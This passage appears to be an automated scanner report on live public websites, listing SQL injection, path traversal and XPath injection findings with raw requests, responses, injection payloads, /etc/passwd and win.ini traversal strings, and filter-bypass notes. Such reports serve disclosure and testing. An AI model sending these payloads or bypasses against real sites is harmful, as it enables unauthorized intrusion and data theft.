Set-Cookie: reloadCheck=%2Ffavicon.ico%26%23039%3Bnull; Domain=.dealtime.com; Path=/
Set-Cookie: perm=countryCode%3Dus; Domain=.dealtime.com; Expires=Thu, 01-Apr-2021 13:39:15 GMT; Path=/
Set-Cookie: DealTimeUserID=Q2kuror0CK; Domain=.dealtime.com; Expires=Thu, 01-Apr-2021 13:39:15 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Sat, 02 Apr 2011 13:39:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body id="error">
...[SNIP]...

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dealtime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: brc=www0.dealtime.com; Domain=dealtime.com; Expires=Sun, 03-Apr-2011 13:39:15 GMT; Path=/
Location: http://www0.dealtime.com/favicon.ico''
Set-Cookie: session=ts%3D2; Domain=.dealtime.com; Path=/
Content-Length: 0
Date: Sat, 02 Apr 2011 13:39:15 GMT
Connection: close


1.6. http://www.essortment.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.essortment.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.essortment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Content-Length: 122
Server: TornadoServer/0.1
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 13:35:16 GMT
Connection: close

You don't even get a site specific 404: HTTP 500: Internal Server Error ({
"GrammarParsingError": "Invalid CQL : '"
})

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.essortment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: TornadoServer/0.1
Date: Sat, 02 Apr 2011 13:35:17 GMT
Content-Length: 14756
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

1.7. http://www.ftd.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 13030870'%20or%201%3d1--%20 and 13030870'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico13030870'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ftd.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 419
Date: Sat, 02 Apr 2011 13:47:27 GMT
X-Varnish: 1965658938
Age: 14
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 1965658938</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /favicon.ico13030870'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ftd.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=BF7AFCBE5D2F105D000DE46EBF25E07E; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=BF7AFCBE5D2F105D000DE46EBF25E07E; Path=/; Domain=.ftd.com; expires=Sat, 02-04-2021 13:47:27 GMT
Vary: Accept-Encoding
X-Accelerator-Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-VR-Note: no-gzip: UA=curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 80223
Date: Sat, 02 Apr 2011 13:47:28 GMT
X-Varnish: 1841592671
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20101223/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our oner
...[SNIP]...

1.8. http://www.guitarcenter.com/favicon.ico [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.guitarcenter.com
Path:   /favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%2527
Host: www.guitarcenter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
SN: 88
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:15:08 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%2527%2527
Host: www.guitarcenter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:15:10 GMT
Server: Microsoft-IIS/6.0
ETag:
SN: 27
X-Powered-By: ASP.NET
Set-Cookie: ASP.NET_SessionId=ouzuzrhrhudggjo104yitfb0; path=/; HttpOnly
Set-Cookie: ref=; path=/
Set-Cookie: ref_d=4/2/2011 10:15:10 AM; path=/
Set-Cookie: source=; path=/
Set-Cookie: ad_id=; path=/
Set-Cookie: orig_ref=; expires=Sat, 16-Apr-2011 14:15:10 GMT; path=/
Set-Cookie: orig_ref_d=4/2/2011 10:15:10 AM; expires=Sat, 16-Apr-2011 14:15:10 GMT; path=/
Set-Cookie: orig_source=; expires=Sat, 16-Apr-2011 14:15:10 GMT; path=/
Set-Cookie: orig_ad_id=; expires=Sat, 16-Apr-2011 14:15:10 GMT; path=/
Set-Cookie: uid=2e7cae34-cedd-47d9-9f54-c586e23e3b35; expires=Mon, 02-May-2011 14:15:10 GMT; path=/
Set-Cookie: IsLoyaltyAvailable=False; expires=Mon, 02-May-2011 14:15:10 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 65425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__htmHead"><s
...[SNIP]...

1.9. http://www.inc.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.inc.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 02 Apr 2011 14:21:04 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.11
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from VoxCAST
Connection: close

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:21:05 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.11
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from VoxCAST
Content-Length: 39399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="h
...[SNIP]...

1.10. http://www.psu.edu/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.psu.edu
Path:   /favicon.ico

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.psu.edu
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:04:38 GMT
Server: Apache/1.3.41 (Unix)
Content-Type: text/html
Content-Length: 5468

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</a> &gt; Error 404 - Page not found
           <!-- InstanceEndEditable -->
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.psu.edu
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:38 GMT
Server: Apache/1.3.37 (Unix)
Last-Modified: Wed, 08 Jun 2005 11:51:35 GMT
ETag: "135d-400-42a6dbc7"
Accept-Ranges: bytes
Content-Length: 1024
Content-Type: image/x-icon

.PNG
.
...IHDR................a...    pHYs.................gAMA....|.Q.... cHRM..z%..............u0...`..:....o._.F...vIDATx.b....!e.v.{...1...W@.............?.._|d.../.....000310022+.
......@..E...}..
...[SNIP]...

1.11. http://www.psu.edu/favicon.ico [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.psu.edu
Path:   /favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3'
Host: www.psu.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:04:30 GMT
Server: Apache/1.3.41 (Unix)
Content-Type: text/html
Content-Length: 5468

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</a> &gt; Error 404 - Page not found
           <!-- InstanceEndEditable -->
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3''
Host: www.psu.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:30 GMT
Server: Apache/1.3.37 (Unix)
Last-Modified: Wed, 08 Jun 2005 11:51:35 GMT
ETag: "135d-400-42a6dbc7"
Accept-Ranges: bytes
Content-Length: 1024
Content-Type: image/x-icon

.PNG
.
...IHDR................a...    pHYs.................gAMA....|.Q.... cHRM..z%..............u0...`..:....o._.F...vIDATx.b....!e.v.{...1...W@.............?.._|d.../.....000310022+.
......@..E...}..
...[SNIP]...

1.12. http://www.scholastic.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.scholastic.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 11468862'%20or%201%3d1--%20 and 11468862'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico11468862'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.scholastic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.64
Content-Type: text/html
X-Powered-By: ASP.NET
Location: http://www2.scholastic.com/browse/lessonplan.jsp?id=483
Content-Length: 0
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 13:54:12 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSDACTBQ=JOFOAFGDDIPFMOBAKFPNGCPM; path=/
Cache-Control: private

Request 2

GET /favicon.ico11468862'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.scholastic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 5443
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 13:54:12 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSDACTBQ=KOFOAFGDFDKJCCJFLLJDMEJO; path=/
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Error Page</title>
<link rel="stylesheet" href="/css/header.css" type="text/css">
<script type="text/javascript" type="text/javascript" src="/menu/templates/global.js"></script>
<!-- MSN -->
<script type="text/javascript" src="/menu/templates/msnkids.js"></script>
<!-- /MSN -->
</head>
<body >

<div id="schlPageWrapper">

<script type="text/javascript">imgRoot = "/universal/images/";</script>
<script type="text/javascript" src="/universal/universal.js"></script>


<div id="schlPageContent">

<div id="schlHeader">

<table border="0" cellpadding="0" cellspacing="0" id="innerHeader">
<tr valign="bottom">
<td id="schlChannel">&nbsp;</td>
<td>
<div id="schlSearchBox">
<form name="searchForm" action=" http://www2.scholastic.com/browse/search" method="get" onsubmit="return setItHead();"><div id="gSearch">
               <table border="0" cellpadding="0" cellspacing="0" width="278">
       <tr>
       <td id="txtSearch"><input type="text" size="20" name="query" value="" class="txtSearch" /></td>
       <td><input type="image" src="/images/nav3.o/btnNavSearch.gif" border="0" class="btnSearch" alt="Search" /></td>
       </tr>
       </table>
   </div>            
       
   </form>
</div>
</td>
</tr>
</table>


</div><!-- /header -->


<div id="schlMainContent">

<div id="schlContent">

<!--div id="schlSkyscraper">&nbsp;</div-->

<div id="schlLegacy">
<img src="/images/nav3.o/wrapper_box_top.jpg" width="743" height="12" alt="" class="dBlock" />
<div class="box743Borders">
<!--begin page content-->

<!-- REQUEST URI: /404error.asp -->
<!-- curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 -->
<!-- generic.html -->


<!-- ORIGINAL BODY TAG --
...[SNIP]...

2. File path traversal  previous  next
There are 4 instances of this issue:


2.1. http://www.bodybuilding.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bodybuilding.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload favicon.ico../../../../../../../../etc/passwd%00favicon.ico was submitted in the REST URL parameter 1. The requested file was returned in the application's response.

Request

GET /favicon.ico../../../../../../../../etc/passwd%00favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bodybuilding.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny3
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:40:37 GMT
Content-Length: 30357
Connection: close

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'>
<html>
<head>
<!-- Rawberry -->
<title>Bodybuilding.com - PAGE NOT FOUND! 404 Error.</title>
<meta name
...[SNIP]...
server=""
s.channel="root"
s.products=""
s.prop30="B"
s.eVar30="B"
s.prop41="Anonymous"
s.eVar41="Anonymous"
s.prop1="Fun: Article"
s.eVar1="Fun: Article"
s.prop2="Article"
s.eVar2="Article"
s.prop33="Root: PAGE NOT FOUND! 404 Error."
s.eVar33="Root: PAGE NOT FOUND! 404 Error."
s.events="event3"
s.pageType=""
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_cod
...[SNIP]...

2.2. http://www.buzzfeed.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.buzzfeed.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload favicon.ico../../../../../../../../etc/passwd%00favicon.ico was submitted in the REST URL parameter 1. The requested file was returned in the application's response.

Request

GET /favicon.ico../../../../../../../../etc/passwd%00favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzfeed.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:37:18 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 02 Apr 2011 13:00:01 GMT
ETag: "1190105-69e2-49fef1ab65640"
Accept-Ranges: bytes
Content-Length: 27106
Vary: Accept-Encoding,User-Agent
X-BuzzFeed: feed5
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<script type="text/javascript">
fb_is_enabled = false;

fb_is_enabled = true;


var BF_STATIC = {static_root: 'http://s-ak.buzzfed.com/static', image_root: 'http://s-ak.buzzfed.com', web_root: '', version: '1301693588', facebook_enabled: fb_is_enabled, fb_app_id:'45075597673', fb_api_key: 'c11330e934b70cdeed6
...[SNIP]...

2.3. http://www.cabelas.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cabelas.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload favicon.ico../../../../../../../../etc/passwd%00favicon.ico was submitted in the REST URL parameter 1. The requested file was returned in the application's response.

Request

GET /favicon.ico../../../../../../../../etc/passwd%00favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cabelas.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 02 Apr 2011 07:00:02 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=604800
Date: Sat, 02 Apr 2011 13:32:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html >
       <head>
       <title>Cabela's - Page Not Found</title>
       <!--[if lt IE
...[SNIP]...
<li class="heading">Other Ways to Shop Home &amp; Cabin:</li>
...[SNIP]...

2.4. http://www.info.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.info.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload favicon.ico..\..\..\..\..\..\..\..\..\..\winnt\win.ini was submitted in the REST URL parameter 1. The requested file was returned in the application's response.

Request

GET /favicon.ico..\..\..\..\..\..\..\..\..\..\winnt\win.ini HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.info.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.218CKMLM; path=/
Date: Sat, 02 Apr 2011 13:42:41 GMT
Server: Apache
Set-Cookie: a=newwindow+1+dpcollation_web+1+lang+0+familyfilter+1+bold+1+msRecentSearches+off+autocorrect+0+domain+infocom+ts+1301751761+last_cmp++engineset+int-only; expires=Wed, 01-Apr-2037 20:50:37 GMT; path=/; domain=.info.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 52097

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Info.com - favicon.ico....................winntwin.ini - www.Info.com</title><link rel="shortcut icon" href="http:
...[SNIP]...
020039722EE73D3D91B91E26214CF" target="_blank" title="http://forum.emsisoft.com/Default.aspx?g=posts&t=6235" class=d>... PROGRA~1\Skype\Toolbars\INTERN~1\favicon.ico O9 - Extra ... Displaying WIN.INI: ; for 16-bit app support [fonts] ... C:\WINNT\PCHealth\HelpCtr\Binaries: ...</a>
...[SNIP]...

3. XPath injection  previous  next
There are 4 instances of this issue:


3.1. http://www.cartoonnetwork.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cartoonnetwork.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:45:44 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 29979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

3.2. http://www.ning.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ning.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ning.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
X-XN-Trace-Token: 035d4f9a-70d6-4175-ab94-68258d4901cd
Server: Ning HTTP Server 2.0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=2888191c-8dd6-4fbf-b6df-ac955ebc0b1e;Path=/;Domain=.ning.com;Expires=Tue, 30-Mar-21 13:26:00 GMT
Set-Cookie: ning_session="nVdNOstw1Wwd3pQ9MfERZ5XA7iW5omP426d+IYw4032/qSqXv9ggV+DXyj999oWzF1tcrKfyFAU=";Path=/;Domain=ning.com;Expires=Sat, 02-Apr-11 14:26:00 GMT
XN-ResponseFrom: 10.16.47.166,(10.16.106.52,301,33)
Date: Sat, 02 Apr 2011 13:26:00 GMT
Set-Cookie: P=a%3A2%3A%7Bs%3A6%3A%22locale%22%3BN%3Bs%3A2%3A%22ab%22%3Bi%3A1691950182%3B%7D; expires=Tue, 30-Mar-2021 13:26:00 GMT; path=/
Location: http://www.ning.com/
Content-Type: text/html; charset=utf-8
Content-Length: 19093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<script>xp_subscribe('LogPageView', function(label_1, label_2, client_page_load_time, server_page_load_time) { xg_track_dynamic('PageView',{date:'xdate',host:'xhost',path:'xpath',user_agent:'xua',ip:'xip',cookie:'s',subdomain:'spretzel',screen_name:'s',section:'s',is_owner:'b0',is_admin:'b0',is_member:'b0',join_date:'80',referrer:'s',reload_count:'20',client_page_load_time_de
...[SNIP]...

3.3. http://www.thefind.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thefind.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /favicon.ico'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thefind.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
